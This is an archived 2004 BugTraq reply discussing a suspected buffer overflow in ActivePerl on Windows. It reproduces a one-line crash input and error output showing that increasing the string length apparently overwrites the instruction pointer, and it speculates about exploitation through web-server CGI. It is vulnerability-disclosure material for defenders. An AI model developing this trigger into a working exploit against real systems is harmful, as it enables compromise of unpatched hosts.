|
|
BugTraq
Buffer Overflow in ActivePerl ? May 17 2004 08:23PM Oliver@greyhat.de (Oliver greyhat de) (3 replies) Re: Buffer Overflow in ActivePerl ? May 18 2004 12:58AM rich sf lclogic com (2 replies) RE: [Full-Disclosure] Re: Buffer Overflow in ActivePerl ? May 18 2004 11:22AM Bill Royds (full-disclosure royds net) |
|
Privacy Statement |
> i played around with ActiveState's ActivePerl for Win32, and crashed
> Perl.exe with the following command:
>
> perl -e "$a="A" x 256; system($a)"
Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus
all but last week's security patch:
perl -e "$a="A" x 256; system($a)"
perl.exe - Application error
Unhandled instruction at "0x77fcc83d" referenced memory at
"0x00657865. The memory could not be "written".
Also, it is likely exploitable -- push up the number of A's a bit:
C:\>perl -e "$a="A" x 259; system($a)"
perl.exe - Application error
Unhandled instruction at "0x77fcc83d" referenced memory at
"0x65004141. The memory could not be "written".
and we seem to get control of EIP. Coincidence? Try yet two more:
C:\>perl -e "$a="A" x 261; system($a)"
perl.exe - Application error
Unhandled instruction at "0x77fcc83d" referenced memory at
"0x41414141. The memory could not be "written".
Looks like full control of EIP...
However, there is not likely to be a privilege escalation here unless
perhaps a script processor on a web server can be cajoled into doing
something with this?? (Not at all familiar with the innards of Windows
web servers and their relationship to their CGI, etc processors...)
--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
[ reply ]